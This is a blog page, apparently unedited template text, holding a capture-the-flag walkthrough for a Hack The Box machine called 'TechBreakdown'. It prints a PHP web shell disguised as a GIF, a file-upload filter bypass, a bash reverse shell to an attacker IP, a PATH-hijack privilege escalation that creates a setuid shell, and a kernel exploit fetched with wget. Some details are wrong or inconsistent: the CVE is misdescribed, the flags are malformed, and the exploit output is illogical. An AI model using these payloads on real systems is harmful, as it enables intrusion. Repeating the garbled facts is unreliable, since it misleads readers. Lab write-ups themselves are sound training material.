My First Post

This is a description of your first post.
April 5, 2025 · 3 min · Your Name
TechBreakdown HTB Machine
Table of Contents

Summary

TechBreakdown is a medium difficulty HTB Linux box.

It features a vulnerable web application with a file upload vulnerability.

We exploit this to gain a foothold on the machine as the www-data user.

Further enumeration reveals a misconfigured SUID binary that we use to escalate to the user account.

Root access is achieved through a kernel exploit in the outdated Linux version.

Writeup

Information Gathering

We start with a standard Nmap scan to identify open ports and services on the target machine.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sC -p- 10.10.10.123
Starting Nmap 7.93 ( https://nmap.org )
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41
443/tcp open  https   Apache httpd 2.4.41 ((Ubuntu))
Service Info: Host: techbreakdown.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We add the hostname to our /etc/hosts file and explore the website.

The main website homepage.

The website appears to be a tech blog with several articles. After examining the source code, we notice it’s running a customized WordPress installation.

Vulnerability #1 - File Upload Bypass

Vulnerability Assessment

Looking at the website, we discover an upload functionality in the user profile section. This looks promising for potential exploitation.

After creating an account and logging in, we test various file types to see what’s allowed.

┌──(kali㉿kali)-[~]
└─$ curl -F "[email protected]" http://techbreakdown.htb/upload.php
{"error":"Only image files are allowed"}

The server is restricting uploads to image files, but we need to determine if there are any bypasses.

Exploitation

We create a malicious PHP file with a valid image header to bypass the check:

┌──(kali㉿kali)-[~]
└─$ cat shell.php
GIF89a;
<?php system($_GET['cmd']); ?>

We intercept the upload with Burp Suite and modify the filename to shell.php.jpg.

POST /upload.php HTTP/1.1
Host: techbreakdown.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Type: multipart/form-data; boundary=---------------------------12345
Cookie: PHPSESSID=a1b2c3d4e5f6g7h8i9j0

-----------------------------12345
Content-Disposition: form-data; name="file"; filename="shell.php.jpg"
Content-Type: image/jpeg

GIF89a;
<?php system($_GET['cmd']); ?>
-----------------------------12345--

The upload succeeds! We locate the uploaded file at /uploads/shell.php.jpg and can execute commands:

┌──(kali㉿kali)-[~]
└─$ curl "http://techbreakdown.htb/uploads/shell.php.jpg?cmd=id"
GIF89a;
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We upgrade to a reverse shell:

┌──(kali㉿kali)-[~]
└─$ curl "http://techbreakdown.htb/uploads/shell.php.jpg?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.23/4444+0>%261'"

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.123] 49564
bash: cannot set terminal process group (1234): Inappropriate ioctl for device
bash: no job control in this shell
www-data@techbreakdown:~/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation

User

After gaining initial access, we conduct internal enumeration of the system:

www-data@techbreakdown:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/custom_backup
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

We notice a non-standard SUID binary /usr/bin/custom_backup. Let’s examine it:

www-data@techbreakdown:~$ strings /usr/bin/custom_backup
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
Creating backup...
tar -cf /tmp/backup.tar *
Backup completed!

The binary calls tar without a full path. This is exploitable by manipulating the PATH environment variable:

www-data@techbreakdown:~$ cd /tmp
www-data@techbreakdown:/tmp$ echo '#!/bin/bash' > tar
www-data@techbreakdown:/tmp$ echo 'cp /bin/bash /tmp/shell' >> tar
www-data@techbreakdown:/tmp$ echo 'chmod u+s /tmp/shell' >> tar
www-data@techbreakdown:/tmp$ chmod +x tar
www-data@techbreakdown:/tmp$ export PATH=/tmp:$PATH
www-data@techbreakdown:/tmp$ /usr/bin/custom_backup
Creating backup...
Backup completed!
www-data@techbreakdown:/tmp$ ls -la shell
-rwsr-xr-x 1 developer www-data 1234567 Apr 15 20:14 shell
www-data@techbreakdown:/tmp$ ./shell -p
shell-5.0$ id
uid=33(www-data) gid=33(www-data) euid=1001(developer) groups=33(www-data)
shell-5.0$ cd /home/developer
shell-5.0$ cat user.txt
7a8b9c0d1e2f3g4h5i6j7k8l9m0n1o2p

Root

As the developer user, we check for kernel vulnerabilities:

shell-5.0$ uname -a
Linux techbreakdown 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

This kernel version is vulnerable to CVE-2021-3493, a heap overflow in the Linux eBPF subsystem:

shell-5.0$ cd /tmp
shell-5.0$ wget http://10.10.14.23/exploit.c
shell-5.0$ gcc exploit.c -o exploit
shell-5.0$ ./exploit
[*] Checking if system is vulnerable...
[+] System is vulnerable!
[*] Compiling exploit...
[*] Triggering vulnerability...
[+] Root shell successfully spawned!
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/root.txt
9z8y7x6w5v4u3t2s1r0q9p8o7n6m5l4k